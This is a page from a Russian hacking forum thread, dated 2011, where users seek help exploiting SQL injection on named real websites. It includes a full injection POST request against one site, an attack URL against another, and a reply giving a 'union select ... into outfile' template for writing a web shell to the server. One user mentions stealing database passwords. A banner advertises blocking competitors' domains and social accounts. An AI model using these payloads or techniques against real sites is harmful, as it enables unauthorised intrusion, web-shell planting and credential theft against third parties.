Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1775 из 2438

1775

Опции темы

Поиск в этой теме

Опции просмотра

#17741

28.07.2011, 21:10

Cherep

Новичок

Регистрация: 30.05.2010

Сообщений: 10

С нами: 8395350

Репутация: 0

Цитата:

Сообщение от Expl0ited

php интерпретатору не удалось получить информацию о удаленном хосте

у меня какбы заходит спокойно по адресу шелла. И что делать?

#17742

28.07.2011, 21:32

Expl0ited

Познавший АНТИЧАТ

Регистрация: 16.07.2010

Сообщений: 1,022

С нами: 8328566

Репутация: 935

Цитата:

Сообщение от Cherep

у меня какбы заходит спокойно по адресу шелла. И что делать?

Использовать поиск по форуму: /showthread.php?t=191917

И внимательно читать не только первый пост.

#17743

28.07.2011, 21:44

eclipse

Участник форума

Регистрация: 19.12.2010

Сообщений: 155

С нами: 8103926

Репутация: 85

Помогите раскрутить SQL inj

Уязвимая страница

Код:

http://www.allyachts.ru/YachtsSearch.asp?ret=2

POST запросом отсылаем

Код:

actSearche=1&selectsearche=0&intsearche=2&strsearche=%26verf%3D%26Kind%3D%26intsearcheto1%3D85%26intsearchefrom1%3D2%2C35%26intsearcheto2%3D30%26intsearchefrom2%3D0%27&ID_Employees=&ID_Purpose=&ID_KindOfYachts=&ID_SeaWorthiness=&ID_MaterialBody=&ID_Engine=&ID_IntSearche1=1&intsearchefrom1=2%2C35&ifmin1=2%2C35&intsearcheto1=85&ifmax1=85&ID_IntSearche2=INJECTION&intsearchefrom2=0&ifmin2=0&intsearcheto2=30&ifmax2=30

тип БД - MSSQL

Описание проблемы

Цитата:

Сообщение от None

Там уязвимые поля имеют числовой тип в итоге чтобы туда я не писал сервер пытается сконвертить ответ в число что у него конечно не получается, вот и нашел другие параметры но в этих параметрах у меня не получается вызвать какую-либо реакцию, может быть у меня опять че-то замкнуло?

#17744

28.07.2011, 22:14

FlaktW

Участник форума

Регистрация: 19.08.2009

Сообщений: 115

С нами: 8803961

Репутация: 8

Цитата:

Сообщение от eclipse

Помогите раскрутить SQL inj
Уязвимая страница

Код:

http://www.allyachts.ru/YachtsSearch.asp?ret=2

POST запросом отсылаем

Код:

actSearche=1&selectsearche=0&intsearche=2&strsearche=%26verf%3D%26Kind%3D%26intsearcheto1%3D85%26intsearchefrom1%3D2%2C35%26intsearcheto2%3D30%26intsearchefrom2%3D0%27&ID_Employees=&ID_Purpose=&ID_KindOfYachts=&ID_SeaWorthiness=&ID_MaterialBody=&ID_Engine=&ID_IntSearche1=1&intsearchefrom1=2%2C35&ifmin1=2%2C35&intsearcheto1=85&ifmax1=85&ID_IntSearche2=INJECTION&intsearchefrom2=0&ifmin2=0&intsearcheto2=30&ifmax2=30

тип БД - MSSQL
Описание проблемы

Эту скулю не раскрутить

#17745

28.07.2011, 23:58

eclipse

Участник форума

Регистрация: 19.12.2010

Сообщений: 155

С нами: 8103926

Репутация: 85

Цитата:

Сообщение от None

Эту скулю не раскрутить

С чего ты взял? Аргументируй пож.

#17746

29.07.2011, 00:30

plaeer

Участник форума

Регистрация: 08.03.2011

Сообщений: 149

С нами: 7990166

Репутация: 1

Всем привет. Нашёл скулю на одном сайтике, через её посмотрел конфиг с паролями от БД, но муадмин не нашёл. Пробовал через шелл законектится с другого хоста, безрезультатно. Что можно сделать? очень нужен там шелл.

#17747

29.07.2011, 01:54

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

С нами: 10095779

Репутация: 137

Цитата:

Сообщение от plaeer

если через скуль прочитал файл то через нее же попробуй залить шелл, для этого тебе надо знать относительный путь сайта и найти директорию разрешенную для заливки файлов

Цитата:

Сообщение от None

*.php?id=-1 union select 'код шела или уплодера' into outfile '/путь до сайта с папкой разрешенной для заливки файлов/shell.php'+--+

#17748

29.07.2011, 02:13

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

С нами: 9410786

Репутация: 2731

Кинь сайт в ПМ.

#17749

29.07.2011, 11:30

eternal stud

Новичок

Регистрация: 02.06.2010

Сообщений: 0

С нами: 8390689

Репутация: 0

Можно как нить раскрутить вот это - http://ugroza.net:80/index.php?do=search&subaction=search&search_start= 0&full_search=0&result_from=1&result_num=20&story= admin&dosearch=admin&titleonly=0&searchuser=\'&exa ctname=yes&replyless=0&replylimit=0&searchdate=0&b eforeafter=after&sortby=date&resorder=desc&showpos ts=0&catlist[]=0&doclear=admin

Заранее спасибо

#17750

29.07.2011, 13:36

Melfis

Постоянный

Регистрация: 25.04.2011

Сообщений: 505

С нами: 7921046

Репутация: 53

Цитата:

Сообщение от eternal stud

eternal stud said:
Можно как нить раскрутить вот это - http://ugroza.net:80/index.php?do=search&subaction=search&search_start= 0&full_search=0&result_from=1&result_num=20&story= admin&dosearch=admin&titleonly=0&searchuser=\'&exa ctname=yes&replyless=0&replylimit=0&searchdate=0&b eforeafter=after&sortby=date&resorder=desc&showpos ts=0&catlist[]=0&doclear=admin
Заранее спасибо

нет, ковычки либо слешируются, либо вырезаются(и не только кавычки). Все параметры, вставляющие в запрос к базе, обрамлены кавычками.

Страница 1775 из 2438

1775

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход